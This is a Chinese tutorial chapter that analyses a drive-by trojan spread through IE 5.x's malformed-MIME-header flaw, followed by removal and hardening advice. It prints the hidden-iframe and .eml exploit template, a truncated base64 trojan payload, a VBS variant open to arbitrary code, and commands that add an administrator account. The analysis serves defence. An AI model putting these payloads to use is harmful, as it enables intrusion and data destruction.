您正在看的注冊表教程是:當心!浏覽網頁也會中木馬-注冊表全攻略。
49、當心!浏覽網頁也會中木馬
如果我對你說浏覽網頁也會感染木馬,你相信嗎?
其實,這已經不是相信不相信的問題了,在半年前就有人使用這種技術來使人中招了!最近聽說有人在浏覽某個網站時中招,因此去那裡看了看,在網頁打開的過程中,鼠標奇怪的變成沙漏形狀,看來的確是有程序在運行。打開計算機的任務管理器,可以看到多了一個wincfg.exe的進程。進程對應的文件在win2000下是c:\winnt\wincfg.exe,在win98下為c:\windows\wincfg.exe。運行注冊表編輯器regedit,在HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\CurrentVersion\Run發現wincfg.exe,哈哈,原來它將自己登記在注冊表開機啟動項中,這樣每次開機都會自動運行wincfg.exe!
注:給你下套的人可以自己設定這個木馬的啟動鍵名和注冊文件名,注冊文件名也就是運行時進程裡的名稱,因此大家看到的結果可能不相同。
運行金山毒霸,報告發現“backdoor bnlite”,哦,原來是木馬bnlite服務端改名為wincfg.exe。別看這個木馬服務端程序不大(只有6.5K),但它的功能可不少:具有ICQ通報功能、遠程刪除服務端功能、設定端口和運行名稱、IP報信(報告服務端所在的IP地址)、上傳下載……如果你中了該木馬,那麼木馬控制端所在完全可以通過這個木馬在你的電腦上建立一個隱藏的ftp服務,這樣別人就有全部權限進入你的電腦了!控制你的電腦將非常容易!
讓我感興趣的是,木馬是如何下載到浏覽了該主頁的用戶的計算機中、並運行起來的。在IE中點擊“工具”→“Internet選項”→“安全”→“自定義安全級別”,將ActiveX相關選項全部都禁用,再浏覽該網頁,wincfg.exe還是下載並運行了!看來和ActiveX無關。在“自定義安全級別”中有關文件下載的選項都禁止,再浏覽該網頁,哈哈!這回wincfg.exe不再下載了。
我們來看看wincfg.exe是如何下載到浏覽者計算機上的,在該網頁上點擊鼠標右鍵,選擇其中的“查看源代碼”,在網頁代碼最後面發現了可疑的一句:
IFRAME src="wincfg.eml" width=1 height=1
注意到其中的“wincfg.eml”了嗎?大家都知道eml為郵件格式,網頁中要eml文件干什麼呢?非常可疑!再次浏覽該網頁,再看看任務管理器,wincfg.exe進程又回來了,原來問題就在這個文件上!既然問題在這文件上,當然想辦法搞到這個文件看看了。用螞蟻把文件下載下來,鼠標剛點上去,wincfg.exe又被執行了,真是陰魂不散啊!
打開a.eml,發現其內容如下:
From: "xxx" To: "xxx" Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57 +800
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: quoted-printable
HTML>
HEAD>
/HEAD>
BODY bgColor=3D#ffffff>
iframe src=3Dcid:THE-CID height=3D0 width=3D0>
/BODY>
--2--
--1
Content-Type: audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID:
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
AAAEAAAAAA……(以下刪掉一大節)
--
你看到的類似“TVqQAAMAAAAEAAAA//8AAL”這樣的字符,就是wincfg.exe經過base64編碼的內容。上面這些代碼中,關鍵的是下面這一段:
Content-Type: audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID:
其中,name="wincfg.exe"這一句定義了文件名稱,在此為wincfg.exe。 而這一句:Content-Transfer-Encoding: base64則定義了代碼格式為base64。
從這句Content-ID: 開始才是代碼的起步,
“TVqQAAMAAAAEAAAA//8AAL”等為wincfg.exe文件的BASE64方式編碼,這個以BASE64方式編碼的文件會反編譯成wincfg.exe文件並運行。這就是浏覽該網頁會中木馬的原因!到此我就明白了,其實,所謂的浏覽網頁會中木馬,只是網頁制作者利用了微軟IE浏覽器中存在的漏洞進行攻擊的一個案例而已,說白了就是利用了錯誤的MIME頭進行攻擊。
1.MIME簡介
MIME(Multipurpose Internet Mail Extentions),一般譯作“多用途的網際郵件擴充協議”。顧名思義,它可以傳送多媒體文件,在一封電子郵件中附加各種格式文件一起送出。現在它已經演化成一種指定文件類型(Internet的任何形式的消息:e-mail,usenet新聞和Web)的通用方法。在使用CGI程序時你可能接觸過MIME類型,其中有一行叫作Content-type的語句,它用來指明傳遞的就是MIME類型的文件(如text/html或text/plain)。
2.錯誤的MIME頭漏洞的發現
該漏洞是由一個國外安全小組發現的,該小組發現在MIME在處理不正常的MIME類型時存在個問題,攻擊者可以創建一個Html格式的E-mail,該E-mail的附件為可執行文件,通過修改MIME頭,使IE不正確處理這個MIME所指定的可執行文件附件。在此,我們來了解一下,IE是如何處理附件的:一般情況下如果附件是文本文件,IE會讀它,如果是VIDEO CLIP,IE會查看它;如果附件是圖形文件,IE就會顯示它;如果附件是一個EXE文件呢?IE會提示用戶是否執行!但令人恐懼的是,當攻擊者更改MIME類型後,IE就不再提示用戶是否執行而直接運行該附件!從而使攻擊者加在附件中的程序、攻擊命令能夠按照攻擊者設想的情況進行。大家不妨想像一下,如果前面提到的wincfg.exe不是木馬,而是惡意程序江民炸彈又會怎麼樣?剎那間,你的硬盤就完蛋了(如果你不懂解法的話)!在Win9X\ME以及WinNT4和Win2k下的Internet Explorer 5.0、5.01、5.5均存在該漏洞,我們常用的微軟郵件客戶端軟件Outlook Express也存在此漏洞。
3.錯誤的MIME頭漏洞的危害
讓我們來看一下如果把上面所說的代碼中最後這部分變為下面這樣,會產生什麼結果呢?
--1
Content-Type: audio/x-wav;
name="hello.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID:
msgbox("你的計算機好危險哦") 說明:在此可以加上任意的VBS的代碼
--1
將該程序編輯存為eml格式的文件,我們運行它,可以看到屏幕上打開一個窗體,顯示“你的計算機好危險哦”。對於這種利用錯誤的MIME頭漏調用VBS文件的形式,會有多大危害呢?想一想,當初的愛蟲病毒是怎麼樣的?愛蟲病毒還需要騙你執行它才使你中毒,但一旦和錯誤MIME頭漏洞結合起來,就根本不需要你執行了,只要你收了這封信且閱讀它,你就中招了。
不僅如此,MIME還可以與command、cmd命令相結合,進行進一步的攻擊。
對於WIN9X用戶來說,只要你的IE浏覽器是5.0、5.01、5.5之中的任意一個版本,在沒打補丁的情況下,攻擊者完全可以利用欺騙的方式讓你打開含有攻擊命令的、帶有錯誤MIME頭的E-mail文件,達到攻擊的目的。事實上,format、deletetree、move等一切MS-DOS下的命令均可加載在其中。
而對於WINNT、WIN2K用戶,尤其是那些不安分守己且網絡安全知識貧乏的系統管理員,利用公司的主服務器上網,攻擊者可以給他發封信,然後利用在以上所示代碼中加上諸如:
net user test 1234567/add
net localgroup administrators test/add
這樣的命令增加用戶或者超級用戶權限,達到進一步入侵的目的。
現在,再回過頭來看看我所中的木馬是怎麼回事。其實,wincfg.exe這個文件在這裡相當於郵件的附件,從我們所列的代碼中可以看到,攻擊者把wincfg.exe的的類型定義為audio/x-wav,由於郵件的類型為audio/x-wav時,IE存在的這個錯誤的MIME頭漏洞會將附件認為是音頻文件自動嘗試打開,結果導致郵件文件a.eml中的附件wincfg.exe被執行。在win2000下,即使是用鼠標點擊下載下來的a.eml,或是拷貝粘貼該文件,都會導致a.eml中的附件被運行,微軟的這個漏洞可真是害人不淺啊。現在看來,原先那些攻擊者想方設法欺騙被攻擊目標執行修改過的木馬等後門程序,是多麼落後的手段啊!如今,利用微軟“創造”的這個大漏洞來進行攻擊,是那麼的簡單、多麼的容易啊!唯一的條件就是被攻擊目標使用IE5.0、5.01、5.5這些浏覽器中的一種,使用IE浏覽器的用戶到底有多少呢?看看你身邊的朋友就知道答案了!
解決辦法:
如果你浏覽網頁中了該木馬,可以用下面的方法來加以解決:
(1)點擊“開始”→“運行”,在彈出的對話框中輸入regedit,回車。然後展開注冊表到HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\CurrentVersion\Run下刪除wincfg.exe;
(2)到你的計算機的系統目錄下,如果操作系統是Win2000,則到c:\winnt下;如果你的操作系統為Win98,則到c:\windows下,刪除其中的wincfg.exe 文件。
(3)重新啟動機器,一切OK了!
預防方法:
1.最好的辦法是不使用IE和Outlook。可以用Netscape代替IE,用Foxmail代替Outlook。如果非要用,建議你按下面的方法進行操作:
(1)運行IE,點擊“工具→Internet選項→安全→Internet區域的安全級別”,把安全極別由“中”改為“高”。
(2)接著,點擊“自定義級別”按鈕,在彈出的窗口中,禁用“對標記為可安全執行腳本的ActiveX控件執行腳本”選項。
(3)同理,在此窗口中禁用IE的“活動腳本”和“文件下載”功能。
(4)禁用所有的ActiveX控制和插件。
(5)設置資源管理器成“始終顯示擴展名”。
(6)禁止以WEB方式使用資源管理器。
(7)取消“下載後確認打開”這種擴展名屬性設置。
(8)永遠不直接從IE浏覽器中選擇打開文件。
2.不要受陌生人的誘惑打開別人給你的RUL,如果確實想看,可以通過一些下載工具把頁面下載下來,然後用記事本等一些文本編輯工具打開查看代碼。
3.微軟公司為該漏洞提供了一個補丁,趕快到下面所列出的URL去看看吧:
http://www.microsoft.com/windows/ie/download/critical/Q290108/default.asp